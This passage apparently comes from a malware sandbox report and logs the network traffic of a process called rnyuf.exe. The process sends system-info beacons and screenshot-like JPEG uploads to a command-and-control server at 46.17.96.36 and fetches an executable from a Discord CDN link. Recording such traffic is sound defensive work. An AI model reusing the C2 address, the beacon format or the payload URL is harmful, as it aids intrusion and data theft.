                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:07.944545031 CEST18824OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:07.944617033 CEST18826OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:07.979790926 CEST18834OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:07.979835987 CEST18840OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:29:07.980022907 CEST18848OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:29:07.980145931 CEST18853OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:29:08.015233994 CEST18856OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:29:08.015271902 CEST18861OUTData Raw: b8 d2 ef de 58 82 ee 31 be 57 e6 50 dc 65 c1 e8 47 6a e5 a7 56 a5 57 cb 08 dd 9b d4 a7 4e 92 e6 9c ac 8f 9f bf b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a f7 33 e2 1f 03 8e ba 4e a7 f9 8f fe 39 5b fa 35 9f 85
                                        Data Ascii: X1WPeGjVWN?]??]3N9[5u5&0`G^y")%6cZXeVh9:GktFdmvs0~^H xY3.Y]Z*9WAQE(>o&Q\bdg)z{WU
                                        Aug 29, 2021 22:29:08.015321016 CEST18872OUTData Raw: 2c ef 2d 6d 24 86 37 92 1f 30 6e 69 03 11 80 e8 a7 8d 87 39 03 b6 33 59 a0 8f 51 5d 4d a6 a5 a5 40 2e ed f5 3d 5e d5 c5 ce a1 61 33 4d a4 5a bd ba 88 e3 f3 03 95 51 12 6d 2b b9 4f 0b 93 9c 8c 9c d6 d5 ce b9 61 e2 7d 5a d7 4b b8 d4 12 7b 7b 8d 3a
                                        Data Ascii: ,-m$70ni93YQ]M@.=^a3MZQm+Oa}ZK{{:Hm~&Gudl(#-;K$_7B/g\wjs2X(9qZxuOkwEWIWLOUet<qe{+u7/YXgYWoTJOO^<Sq
                                        Aug 29, 2021 22:29:08.136305094 CEST18921INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        317192.168.2.45005646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:08.129369020 CEST18921OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:08.229768038 CEST18922INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        32192.168.2.44976746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:24.552092075 CEST4473OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Data Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39
                                        Data Ascii: d1=1000003001&unit=152138533219
                                        Aug 29, 2021 22:27:24.630176067 CEST4474INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0
                                        Aug 29, 2021 22:27:24.671123028 CEST4474OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:24.671242952 CEST4474OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:24.671456099 CEST4484OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:24.671814919 CEST4487OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:24.711401939 CEST4509OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:24.711532116 CEST4514OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:27:24.750602007 CEST4521OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:27:24.750655890 CEST4536OUTData Raw: bd cd ae 3c d4 1d b3 fc fd fd 2b e7 40 4a b0 65 24 10 72 08 ed 5b e9 e2 5b 88 35 7b 4d 72 16 ff 00 4e 55 09 72 bd 04 d8 00 64 ff 00 bc 3a fb 8c f7 15 d7 88 ca 60 dd e9 e9 a7 e3 ff 00 07 f3 38 f0 f9 b4 d2 b5 4d 75 fc 3f e0 7e 47 4b f1 0b fe 48 b6
                                        Data Ascii: <+@Je$r[[5{MrNUrd:`8Mu?~GKH^k~!+kgu]1R4(R){RR-wZbaKIJ(ZJ)8S%p!mpm:ZAKTH)i)E4KO)T`ii-PpA"
                                        Aug 29, 2021 22:27:24.750762939 CEST4557OUTData Raw: 69 5a 00 c5 3b 14 98 a2 c3 b8 a2 97 14 0a 76 29 89 88 29 71 cd 18 a7 77 a6 48 80 53 80 cd 25 38 55 22 58 84 52 62 9e 45 25 0c 06 e2 96 97 14 b8 a6 02 01 4e 14 01 4b 40 98 52 1a 75 03 93 4c 40 a2 a4 51 4d a9 07 02 ad 22 1b 1a d4 ca 94 8e 2a 32 28
                                        Data Ascii: iZ;v))qwHS%8U"XRbE%NK@RuL@QM"*2(` RB(R<V4Q@$QNHD)jKERJM6u cih)i)GZsKLAP(:)ANpLuE!1hP#c6z7s5Q}Ma
                                        Aug 29, 2021 22:27:24.750794888 CEST4567OUTData Raw: eb 9c a5 a7 ec d0 b9 d9 6b 52 d5 35 0d 6a f9 af 35 2b db ab b9 79 08 6e 66 69 4a 2e 49 0a 0b 76 19 3c 55 6a 6f 7a 5a a8 45 45 59 13 29 39 3b b1 48 c8 c5 75 11 f8 e2 78 bf b2 dd 74 d8 be d1 a7 5a c9 1a 4a cc 18 49 3b 20 8d 66 65 65 20 95 8d 55 42
                                        Data Ascii: kR5j5+ynfiJ.Iv<UjozZEEY)9;HuxtZJI; fee UB23\(pSVa8+]hnD/mV<&6]^>3O-8Sp]*W=EC]UrjRK]-$8;nq{{}J}ZN7rOt&R06@ws~
                                        Aug 29, 2021 22:27:24.786503077 CEST4571OUTData Raw: 8a 43 1d 9a 33 4d cd 19 a0 2c 3b 34 94 dc d2 66 95 c7 61 e4 d2 66 9b 9a 4c d2 b8 ec 3b 34 66 99 9a 09 a2 e1 61 d9 a0 9a 6e 69 33 4a e3 b0 a6 8a 4c d1 9a 41 61 73 41 34 dc d2 13 45 c7 61 49 a4 cd 37 34 86 a6 e5 58 75 37 bd 19 34 94 0c 53 d6 83 46
                                        Data Ascii: C3M,;4fafL;4fani3JLAasA4EaI74Xu74SFi3H%ZAE.h5isUpi3IIHvI)JQ@i4S+OCK-4Ss<qdzh5YN(;NI?6TiJ\(|*?]SxC&/o'"ld+
                                        Aug 29, 2021 22:27:24.860306025 CEST4759INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        33192.168.2.449768162.159.134.23380C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:24.698983908 CEST4487OUTGET /attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe HTTP/1.1
                                        Host: cdn.discordapp.com
                                        Aug 29, 2021 22:27:24.726705074 CEST4515INHTTP/1.1 301 Moved Permanently
                                        Date: Sun, 29 Aug 2021 20:27:24 GMT
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Cache-Control: max-age=3600
                                        Expires: Sun, 29 Aug 2021 21:27:24 GMT
                                        Location: https://cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OGkVzr%2Bl1V52U9RIFP%2B56H3qsjD8XtHI5%2FWm5gFnZfyl3D2fKbUn1OdkcFBuc%2BotiHWR65H3QZwVjRmUYdJioEFQZ7ZIitmtk51ln1zNJ3sO%2BEtQ75phEKB%2F6TeMftgFP8oUHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 686885176af05b44-FRA
                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        34192.168.2.44977046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:25.227890968 CEST4841OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----9af1e57389b70ac42b360f895ff149c0
                                        Host: 46.17.96.36
                                        Content-Length: 108322
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:25.228162050 CEST4841OUTData Raw: 2d 2d 2d 2d 2d 2d 39 61 66 31 65 35 37 33 38 39 62 37 30 61 63 34 32 62 33 36 30 66 38 39 35 66 66 31 34 39 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------9af1e57389b70ac42b360f895ff149c0Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:25.228411913 CEST4851OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:25.228549957 CEST4854OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:25.263346910 CEST4857OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:25.263407946 CEST4862OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:25.263546944 CEST4873OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:25.263720036 CEST4874OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:27:25.263787985 CEST4879OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:25.298468113 CEST4882OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:25.298510075 CEST4894OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:25.406219959 CEST4949INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        35192.168.2.44977146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:25.652867079 CEST4950OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----18482e8eccd3978e1e99c57ecdc4fd2f
                                        Host: 46.17.96.36
                                        Content-Length: 109159
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:25.653117895 CEST4950OUTData Raw: 2d 2d 2d 2d 2d 2d 31 38 34 38 32 65 38 65 63 63 64 33 39 37 38 65 31 65 39 39 63 35 37 65 63 64 63 34 66 64 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------18482e8eccd3978e1e99c57ecdc4fd2fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:25.653384924 CEST4960OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:25.653583050 CEST4963OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:25.687438965 CEST4966OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:25.687495947 CEST4979OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:25.687833071 CEST4983OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
